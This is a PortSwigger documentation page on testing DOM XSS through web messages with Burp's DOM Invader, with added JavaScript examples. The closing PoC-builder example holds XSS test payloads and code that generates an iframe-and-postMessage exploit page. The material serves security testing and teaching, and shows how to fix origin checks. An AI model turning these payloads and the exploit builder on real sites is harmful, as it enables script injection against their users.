Message display – PortSwigger


PROFESSIONAL

DOM Invader's messages view greatly simplifies testing for DOM XSS vulnerabilities that use web messages as a source. It lets you intercept messages sent to the target website, view useful details about them, and edit and resend them to check for vulnerabilities. In some ways, it is the web message equivalent of Burp Proxy's HTTP history and Burp Repeater.

You can also allow DOM Invader to automatically generate additional messages to try to identify vulnerabilities on your behalf.

If you need a refresher on web message vulnerabilities, we've covered web message manipulation on the Web Security Academy, where you can also find deliberately vulnerable labs to practice on.

Enabling web message interception

By default, web message interception is disabled. To enable it, click the Burp Suite icon in the upper right corner of the browser, go to the DOM Invader tab, and toggle the Postmessage interception switch.

When prompted, click the Reload button to apply the changes. The messages view should now be available in the DevTools panel.

Post message settings

The DOM Invader settings menu also contains several settings that change how DOM Invader handles web messages. Each of them is described in the sections below.

Viewing intercepted messages

Once you have enabled web message interception, the messages view will automatically list all web messages sent on the page.

Viewing intercepted messages in DOM Invader

The messages you see depend on your settings:

  • If you enable web message interception but none of the other web message settings, DOM Invader intercepts every message sent on the page and forwards it unchanged.

  • If canary injection is enabled, DOM Invader sends each message a second time with the canary injected into the data, and a third time with both the canary and a series of test characters. These characters are useful when constructing an exploit, because you can check whether they arrive at a sink unencoded.

The following information is displayed for each message:

  • ID: A unique identifier for the message. Note that messages DOM Invader generates itself do not have an ID.
  • Severity: An estimate of how dangerous the identified issue is. The mere presence of a web message is always reported as "informational", but if you enable some of the additional web message options, DOM Invader will also report messages whose data it has successfully passed to a sink, for example. Note that the Messages view icon badge turns red when the view contains particularly interesting findings.
  • Confidence: An indication of how confident DOM Invader is that the issue is actually present. Low-confidence findings usually require manual confirmation.
  • Type: The type of the web message data: string, json-string, or json-object.
  • Origin: The origin of the web message, that is, the URL scheme, domain, and port of the page that sent it.
  • Data: The actual content of the message.
  • Stack trace: Clicking this link sends the stack trace to the console. You can use it to quickly locate the exact line of the message event listener.

Viewing Message Details

You can click a message to view more detailed information about it and to resend the message with different values to check for vulnerabilities. If you have enabled any of the additional postmessage settings, you can also toggle between viewing the original data and the modified message data.

Viewing details of web messages in DOM Invader

DOM Invader automatically detects whether the origin, data, and source properties of the message are actually read by JavaScript on the page. This provides clues about how exploitable the message is.

Origin accessed

If the origin of the message is never accessed, the listener cannot be validating it at all. As a result, you may be able to send the message from an arbitrary origin.

Even if the origin is accessed, that does not necessarily mean the site is secure. First, the fact that the origin is read does not mean it is validated correctly. Even when it is, by digging into the source code via the provided stack trace you may be able to find a way around the validation. For ideas on how to do this, read about origin verification on the Web Security Academy.

Likewise, some websites validate the origin in one listener, but you may be able to find other listeners that don't.

Data accessed

Because the message data is where you inject potential payloads, if the site never reads the data in the first place, it cannot reach a sink. Such a message is therefore of no interest.

Source accessed

The source property of a web message is a reference to the window that sent it. In practice, this is usually a reference to an iframe. Websites often validate the source because it is a more reliable way of ensuring that a message comes from a specific, trusted iframe.

As with the origin, keep in mind that even if the source is accessed, that does not necessarily mean it is validated correctly or that the validation cannot be bypassed.

Spoofing the origin of the message

In the DOM Invader settings, you can select the Spoof the origin of the message option. When enabled, DOM Invader automatically replaces the origin of every intercepted message with a spoofed origin in the following format:

target-site.com.faketarget-site.com

For example, if you were testing portswigger.net, the spoofed origin would be:

https://portswigger.net.fakeportswigger.net

Origin spoofing lets DOM Invader identify event listeners that use flawed logic or regular expressions to validate the origin of messages. For example, this spoofed origin trivially passes any validation that only checks whether the origin string begins or ends with a trusted domain name.

If you do not enable this option globally, you can enable it for specific messages by selecting the Spoof origin check box:
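The following added example (not DOM Invader's own code) shows why the spoofed origin format works. It runs the spoofed origin for portswigger.net through four hypothetical origin checks of the kind found in real message listeners, plus one strict allow-list check, and reports which ones let it through:

```javascript
// Added example: how an origin of the form https://target.com.faketarget.com
// defeats prefix, suffix, substring and unanchored-regex origin checks.
// The check functions are hypothetical listener logic, not code from any real site.

const TRUSTED = 'https://portswigger.net';
// Spoofed origin in the format described above (trusted origin + ".fake" + trusted host).
const SPOOFED = 'https://portswigger.net.fakeportswigger.net';

// Five ways a listener might validate event.origin. Only the last one is safe.
const checks = {
  // Accepts anything that *starts* with the trusted origin.
  startsWith: (o) => o.startsWith(TRUSTED),
  // Accepts anything that *ends* with the trusted host name.
  endsWith: (o) => o.endsWith('portswigger.net'),
  // Accepts anything that merely *contains* the trusted host name.
  indexOf: (o) => o.indexOf('portswigger.net') !== -1,
  // Regex with an unescaped dot and no trailing anchor, so it only checks a prefix.
  regex: (o) => /^https:\/\/portswigger.net/.test(o),
  // Strict comparison of the whole origin string against an allow-list.
  exact: (o) => ['https://portswigger.net'].includes(o),
};

// Returns the names of the checks that a given origin passes.
function passingChecks(origin) {
  return Object.keys(checks).filter((name) => checks[name](origin));
}

// Simulated listener: only the "exact" check is used as the gate, so the spoofed
// origin is rejected while the genuine one is accepted.
function strictListener(event) {
  if (!checks.exact(event.origin)) return 'rejected';
  return 'accepted';
}

console.log('genuine origin passes:', passingChecks(TRUSTED));
console.log('spoofed origin passes:', passingChecks(SPOOFED));
console.log('strict listener on spoofed origin:', strictListener({ origin: SPOOFED }));
```

The exact comparison is the fix: compare the full `event.origin` string (scheme, host and port) against a list of complete origins rather than testing a prefix, suffix or substring. When a listener does need to accept several subdomains, parse the origin with `new URL()` and compare the `host` property against a list of exact host names instead of using a regex.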

Spoof the origin of a specific web message using DOM Invader

Note

This check box is hidden whenever origin spoofing is already enabled globally.

Inject a canary via web messages

In the DOM Invader settings, you can select the Inject canary into intercepted messages option. When enabled, DOM Invader injects the canary string into the data of every intercepted message. The canary is highlighted in the message list.

If you click a message, you can use the View drop-down list to toggle between the original data and the modified data containing the injected canary, so that you can compare them.

The messages view also provides the same search functionality as the DOM view, to help you filter the list based on a particular string.

Automatic generation of new messages

In the DOM Invader settings, you can select the Generate automated messages option. When enabled, DOM Invader identifies message event listeners on the page and sends its own web messages to trigger them. This is useful when you want to test a potentially vulnerable event listener but either:

  • No web message is sent to the page.

  • Web messages are sent, but none of them trigger the particular listener you want to test.

DOM Invader attempts to infer the data structure each event listener expects and uses it to send appropriately shaped messages. Depending on how these are handled, it then generates further messages with the data adjusted accordingly. This lets DOM Invader tailor its messages so that they reach additional code paths, which may lead to more dangerous sinks.

For example, consider a message handler that expects to receive a URL and follows different code paths depending on whether or not it contains the string http:, https:, or neither. It might look like this:


window.addEventListener('message', function(e) {
  var url = e.data;
  switch (true){
    case (url.indexOf("http:") > -1):
      // Do something
      break;
    case (url.indexOf("https:") > -1):
      // Do something else
      break;
    default:
      // Invalid URL: Must contain string "http:" or "https:"
      break;
  }
}, false);

In this case, DOM Invader can send an initial message containing an empty string, then follow it with two further messages, one containing http: and one containing https:, so that all three branches are tested and the input flows through each of them. These follow-up messages also contain the same test characters that DOM Invader injects with the usual canary (<>"':), so that you can check what is escaped or encoded.

Note

The canary used in automatically generated web messages is always followed by a sequential number and a hyphen.

You can still distinguish between DOM Invader auto-generated messages because they do not receive a numeric ID.
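The following added example reproduces, by hand and outside the browser, the two techniques described in the canary injection and automatic message generation sections. It is not DOM Invader's code. The canary format (a fixed word, a sequential number, a hyphen) is an assumption modelled on the note above; the handlers, the fake element standing in for a DOM node, and the sink placed inside the http: branch of the page's URL-switch listener are all hypothetical:

```javascript
// Added example: probe message handlers with a canary plus test characters and
// report which characters reach a sink unencoded, trying each branch prefix in turn.
// Handlers and the fake element are hypothetical stand-ins so this runs under Node.

const TEST_CHARS = ['<', '>', '"', "'", ':'];

// Assumed canary format: word + sequential number + hyphen (see the note above).
let seq = 0;
function makeCanary() {
  seq += 1;
  return 'dominv' + seq + '-';
}

// Minimal HTML entity encoder so one handler can be the "safe" comparison case.
function htmlEncode(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}

// Hypothetical listeners. `el` is a fake element with an innerHTML property.
function vulnerableHandler(event, el) { el.innerHTML = event.data; }
function encodingHandler(event, el) { el.innerHTML = htmlEncode(event.data); }

// The page's URL-switch listener with sinks filled in (the page leaves them as comments):
// the http: branch writes into an attribute unencoded, the https: branch uses textContent.
function urlSwitchHandler(event, el) {
  const url = event.data;
  switch (true) {
    case (url.indexOf('http:') > -1):
      el.innerHTML = '<a href="' + url + '">link</a>'; // HTML sink, no encoding
      break;
    case (url.indexOf('https:') > -1):
      el.textContent = url; // not an HTML sink
      break;
    default:
      break; // invalid URL: nothing reaches a sink
  }
}

// Send one probe (prefix + canary + test characters) through a handler and inspect
// the sink. Returns whether the canary reached innerHTML and which test characters
// survived unencoded after it.
function probeHandler(handler, prefix = '') {
  const el = { innerHTML: '' };
  const canary = makeCanary();
  const data = prefix + canary + TEST_CHARS.join('');
  handler({ data, origin: 'https://attacker.example', source: null }, el);
  const idx = el.innerHTML.indexOf(canary);
  if (idx === -1) return { reached: false, unencoded: [] };
  const tail = el.innerHTML.slice(idx + canary.length);
  return { reached: true, unencoded: TEST_CHARS.filter((c) => tail.includes(c)) };
}

// Mimic the follow-up messages: one probe per branch prefix, results keyed by prefix.
function probeBranches(handler, prefixes) {
  const results = {};
  for (const p of prefixes) results[p] = probeHandler(handler, p);
  return results;
}

console.log('vulnerable:', probeHandler(vulnerableHandler));
console.log('encoding:', probeHandler(encodingHandler));
console.log('url switch:', probeBranches(urlSwitchHandler, ['', 'http:', 'https:']));
```

Reading the output the way you would read DOM Invader's messages view: the encoding handler still lets the colon through, which is harmless for innerHTML but would matter if the same data later landed in a URL sink; the URL-switch handler shows that only the http: follow-up message reaches an HTML sink, and that every test character survives there, so a payload in that branch needs no encoding tricks.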

Replay web messages

Once you've identified a potentially vulnerable web message, DOM Invader also makes it easy to test different ways of exploiting it. When you select a web message, you can edit its properties and click Send to replay the message with the new values, just as you do with HTTP requests in Burp Repeater.

For example, you can identify a message in which:

  • The event listener does not validate the origin.

  • The data is passed to a sink, such as element.innerHTML.

  • The characters <, > and " are not escaped.

In this case, you can select the message, change the data to a typical XSS vector, and click Send. If alert() is called, you have found DOM XSS with a web message as the source.

Generating a proof of concept for web message vulnerabilities

Once you have confirmed an exploitable vulnerability, DOM Invader lets you generate an HTML proof of concept with a single click.

To do this, select the vulnerable web message, change the values as required by the exploit, and click Build PoC. The HTML is copied to your clipboard so that you can include it in a bug report, or solve some of our DOM XSS labs on the Web Security Academy by delivering it to the simulated victim through the provided exploit server.
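As an added illustration of what such a proof of concept has to contain, the following function builds, by hand, the kind of page an exploit server would host: an iframe that loads the target, then a postMessage to it once the frame has loaded. This is not DOM Invader's Build PoC output, and the target URL and payloads in the usage calls are constructed placeholders. The point it demonstrates is the escaping: the message data is emitted as a JSON literal, and any `</` inside it is escaped so that an attacker-chosen payload cannot prematurely close the PoC's own script block.

```javascript
// Added example: build the HTML proof of concept for a web-message DOM XSS by hand.
// Works for string, json-string and json-object message data because JSON.stringify
// produces a valid JavaScript literal for all three. Target URL and payloads are
// constructed placeholders, not real sites.

function buildPoc(targetUrl, data, targetOrigin = '*') {
  // JSON literal for the message; escape "</" so a payload such as "</script>" cannot
  // terminate the PoC's <script> block, and escape U+2028/U+2029 for older JS engines.
  const literal = JSON.stringify(data)
    .replace(/<\//g, '<\\/')
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
  // The URL goes into a double-quoted HTML attribute: encode & and ".
  const src = targetUrl.replace(/&/g, '&amp;').replace(/"/g, '&quot;');
  // targetOrigin is "*" when the listener does not validate the origin (as in the
  // scenario above); use the target's real origin if it does.
  return [
    '<iframe id="target" src="' + src + '"></iframe>',
    '<script>',
    "document.getElementById('target').onload = function () {",
    '  this.contentWindow.postMessage(' + literal + ', ' + JSON.stringify(targetOrigin) + ');',
    '};',
    '</script>',
  ].join('\n');
}

// Constructed examples: a plain string payload, a payload that tries to break out of
// the script block, and a json-object message for a listener that expects structured data.
const TARGET = 'https://vulnerable-website.example/?a=1&b=2';
console.log(buildPoc(TARGET, '<img src=1 onerror=alert(1)>'));
console.log(buildPoc(TARGET, '</script><script>alert(1)</script>'));
console.log(buildPoc(TARGET, { type: 'load', url: 'javascript:alert(1)' }));
```

Deliver the resulting HTML from the exploit server and open it as the victim; the alert fires in the target's origin because the message is processed by the target page's own listener, not by the PoC page.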

